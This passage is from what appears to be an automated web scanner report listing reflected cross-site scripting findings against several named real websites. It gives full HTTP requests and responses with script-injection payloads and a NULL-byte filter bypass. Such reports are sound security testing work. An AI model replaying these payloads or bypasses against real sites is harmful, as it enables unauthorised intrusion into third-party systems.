Cookie: VM_PIX="AQAAAAwAAArrAQAAAAMAAAEt98vDoAAAAS332v9sAAABLffbZhUAAArYAQAAAAIAAAEt99r/bAAAAS3322YVAAAK6gEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAKywEAAAADAAABLffLw6AAAAEt99r/bAAAAS3322YVAAAK6QEAAAACAAABLffa/2wAAAEt99tmFQAACugBAAAAAQAAAS33y8OgAAAPpgEAAAACAAABLffa/2wAAAEt99tmFQAACs0BAAAAAQAAAS33y8OgAAAKzAEAAAABAAABLffLw6AAAArSAQAAAAEAAAEt98vDoAAABBUBAAAAAQAAAS2qBrSKAAAK1QEAAAABAAABLffLw6AAAAAAnwCngQ--"; VM_USR=AEzVm3phPEGhmHnIrJhIDIAAADqMAAA63wcAAAEt+yNLhQA-

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript
Vary: Accept-Encoding
Date: Sun, 06 Feb 2011 13:22:55 GMT
Content-Length: 12150

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
4508","dma":623,"POSTCODE":"75207","user-agent":"Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13","REGIONNAME":"Texas","muid":"","aa9e1"-alert(1)-"d53ef40e92d":"1","city":"Dallas","jscallback":"$iTXT.js.callback0","reg":"tx","refurl":"http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/","rcc":"us","cc":"us"},null,60);var un
...[SNIP]...

4.24. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html [btid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R8lWflQ0f_326769041.html

Issue detail

The value of the btid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62043"><script>alert(1)</script>6de2e5bdc2d was submitted in the btid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F862043"><script>alert(1)</script>6de2e5bdc2d&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 20:50:58 GMT
Server: w55c.net
Cache-Control: no-cache, no-store
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Mon, 04-Feb-13 21:49:14 GMT
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 06 Jan 2011 16:51:47 GMT
Age: 3496
pragma: no-cache
Via: 1.1 mdw061004 (MII-APC/1.6)
Content-Length: 3451

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr13.sldc.dataxu.net/x/bcs0?btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F862043"><script>alert(1)</script>6de2e5bdc2d&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw" />
...[SNIP]...

4.25. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html [ei parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R8lWflQ0f_326769041.html

Issue detail

The value of the ei request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19116"><script>alert(1)</script>eb6398a7c was submitted in the ei parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK19116"><script>alert(1)</script>eb6398a7c&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:30:40 GMT
Server: w55c.net
Cache-Control: no-cache, no-store
Content-Type: text/html
Accept-Ranges: bytes
Last-Modified: Thu, 06 Jan 2011 16:51:47 GMT
Age: 1116
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Mon, 04-Feb-13 21:49:16 GMT
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Nncoection: close
pragma: no-cache
Via: 1.1 mdw061003 (MII-APC/1.6)
Content-Length: 3449

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr13.sldc.dataxu.net/x/bcs0?btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK19116"><script>alert(1)</script>eb6398a7c&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw" />
...[SNIP]...

4.26. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html [rtbhost parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R8lWflQ0f_326769041.html

Issue detail

The value of the rtbhost request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4721"><script>alert(1)</script>30dfad95144 was submitted in the rtbhost parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.netd4721"><script>alert(1)</script>30dfad95144&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 21:30:40 GMT
Server: w55c.net
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Mon, 04-Feb-13 21:49:12 GMT
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 06 Jan 2011 16:51:47 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 1112
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061004 (MII-APC/1.6)
Content-Length: 3451

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr13.sldc.dataxu.netd4721"><script>alert(1)</script>30dfad95144/x/bcs0?btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8
...[SNIP]...

4.27. http://cdn.w55c.net/i/0R8lWflQ0f_326769041.html [wp_exchange parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://cdn.w55c.net
Path:   /i/0R8lWflQ0f_326769041.html

Issue detail

The value of the wp_exchange request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8a8c2"><script>alert(1)</script>adc13858a3b was submitted in the wp_exchange parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /i/0R8lWflQ0f_326769041.html?rtbhost=rts-rr13.sldc.dataxu.net&btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzItZjJkNS00NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw8a8c2"><script>alert(1)</script>adc13858a3b&euid=Q0FFU0VDSUFxLVBVbW8yVVJpZkRFMzFLLTJB&slotid=MQ&fiu=MEZya1ZmSmN4QQ&ciu=MFI4bFdmbFEwZg&reqid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkM&ccw=SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjB8SUFCNyMwLjB8SUFCMiMwLjB8SUFCMyMwLjA&epid=&bp=4400&dv=&dm=&dc=&os=&scres=&gen=&age=&zc=NzUyMDc&s=http%3A%2F%2Fwww.orthougm.com%2F&refurl= HTTP/1.1
Host: cdn.w55c.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-0813152173226346&output=html&h=60&slotname=3865030659&w=468&lmt=1296964160&flash=10.1.103&hl=en&url=http%3A%2F%2Fwww.orthougm.com%2F&dt=1296942560320&shv=r20101117&jsv=r20110120&saldr=1&prev_slotnames=8833934355%2C8094259765&correlator=1296942560294&frm=0&adk=2257162608&ga_vid=429166960.1296942499&ga_sid=1296942499&ga_hid=1263121855&ga_fc=1&u_tz=-360&u_his=2&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=969&bih=1012&ref=http%3A%2F%2Fwww.orthougm.com%2Fnslookup.html&fu=0&ifi=3&dtd=3&xpc=dnlnsmkeRR&p=http%3A//www.orthougm.com
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: matchadmeld=1; matchpubmatic=1; matchbluekai=1; matchrubicon=1; matchgoogle=1; matchappnexus=1; wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 20:50:58 GMT
Server: w55c.net
Set-Cookie: wfivefivec=MDo0lVW4JKDM6LrVGjt5veKcuBH63bWQ;Path=/;Domain=.w55c.net;Expires=Mon, 04-Feb-13 21:49:18 GMT
Nncoection: close
P3p: policyref='http://w55c.net/w3c/p3p.xml', CP='DSP NOI COR'
Accept-Ranges: bytes
Last-Modified: Thu, 06 Jan 2011 16:51:47 GMT
Content-Type: text/html
Via: 1.1 ics_server.xpc-mii.net (XLR 2.3.0.2.23a), HTTP/1.1 cdn.w55c.net (MII JProxy)
Age: 3500
Cache-Control: no-cache, no-store
pragma: no-cache
Via: 1.1 mdw061004 (MII-APC/1.6)
Content-Length: 3451

<div style="height: 0; line-height: 0; border: 0; margin: 0; padding: 0; display: none; "><img src="http://rts-rr13.sldc.dataxu.net/x/bcs0?btid=NEQ0REM1Q0QwMDA0QTNFOTBBRTU3QjE0RTUzMDI5NkN8ZDA3NTFmYzIt
...[SNIP]...
0NTY4LTlmMDMtMjJjYjVmZDA3NTU4fDEyOTY5NDI1NDI5NzF8MXwwRnJrVmZKY3hBfDBSOGxXZmxRMGZ8TURvMGxWVzRKS0RNNkxyVkdqdDV2ZUtjdUJINjNiV1F8&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TU3FzQAEo-kK5XsU5TApbEC2JVNdMc7sOaGvXw8a8c2"><script>alert(1)</script>adc13858a3b" />
...[SNIP]...

4.28. http://connect.in.com/kochupusthakam/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://connect.in.com
Path:   /kochupusthakam/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37075"><a>62ad8f466de was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /kochupusthakam37075"><a>62ad8f466de/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html HTTP/1.1
Host: connect.in.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix)
Pragma: no-cache
nnCoection: close
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 05 Feb 2011 21:51:08 GMT
Date: Sat, 05 Feb 2011 21:51:08 GMT
Content-Length: 27769
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<meta name="description" content="Kochupusthakam37075"><a>62ad8f466de: MALAYALAM KAMBI KATHAKAL, KOCHU PUSTHAKAM. kambi kathakal kochupusthakam kambi kathakal kochupusthakam kambi kathakal kochupusthakam malayalam sex stories. MALAYALAM MASALA STORIES, MASALA VIDEOS. NI
...[SNIP]...

4.29. http://connect.in.com/kochupusthakam/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://connect.in.com
Path:   /kochupusthakam/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 76add<a>35d4dfe19df was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /kochupusthakam76add<a>35d4dfe19df/blog/malayalam-kambi-kathakal-kochu-pusthakam-hot-stories-08e6ccaa51723198405bf5af8bd98aab75c93754.html HTTP/1.1
Host: connect.in.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/2.2.4 (Unix)
Pragma: no-cache
nnCoection: close
Content-Type: text/html
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Sat, 05 Feb 2011 21:51:15 GMT
Date: Sat, 05 Feb 2011 21:51:15 GMT
Content-Length: 27761
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Cont
...[SNIP]...
<a href="/kochupusthakam76adda35d4dfe19df/profile.html">Kochupusthakam76add<a>35d4dfe19df</a>
...[SNIP]...

4.30. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload %006e9cc<a>d0254a6f966 was submitted in the REST URL parameter 1. This input was echoed as 6e9cc<a>d0254a6f966 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%006e9cc<a>d0254a6f966/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 16:04:53 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1643
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a>d0254a6f966/">weblog%006e9cc<a>d0254a6f966</a>
...[SNIP]...

4.31. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %005d974"><script>alert(1)</script>c01828428ea was submitted in the REST URL parameter 1. This input was echoed as 5d974"><script>alert(1)</script>c01828428ea in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /weblog%005d974"><script>alert(1)</script>c01828428ea/2006/03/base/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 16:04:52 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
Vary: Accept-Encoding
Content-Length: 1789
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html>
<head>
<title>/404</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwardsoffline.appspot.com/c
...[SNIP]...
<a href="/weblog%005d974"><script>alert(1)</script>c01828428ea/2006/">
...[SNIP]...

4.32. http://dean.edwards.name/weblog/2006/03/base/ [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://dean.edwards.name
Path:   /weblog/2006/03/base/

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 39526<a>384b191b99b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /weblog/2006/03/base39526<a>384b191b99b/ HTTP/1.1
Host: dean.edwards.name
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Sun, 06 Feb 2011 16:04:58 GMT
Server: Apache/2.2.6 (Win32) PHP/5.2.5
X-Powered-By: PHP/5.2.5
X-Pingback: http://dean.edwards.name/weblog/xmlrpc.php
Expires: Sun, 06 Feb 2011 16:04:58 GMT
Last-Modified: Sun, 06 Feb 2011 16:04:58 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1351
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html>
<head>
<title>dean.edwards.name/weblog/</title>
<meta name="author" content="Dean Edwards"><!-- Keeping code tidy! :) -->
<link rel="stylesheet" href="http://deanedwards
...[SNIP]...
</a>/base39526<a>384b191b99b/</h1>
...[SNIP]...

4.33. http://dean.edwards.name/weblog/2006/03/base/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://dean.edwards.name
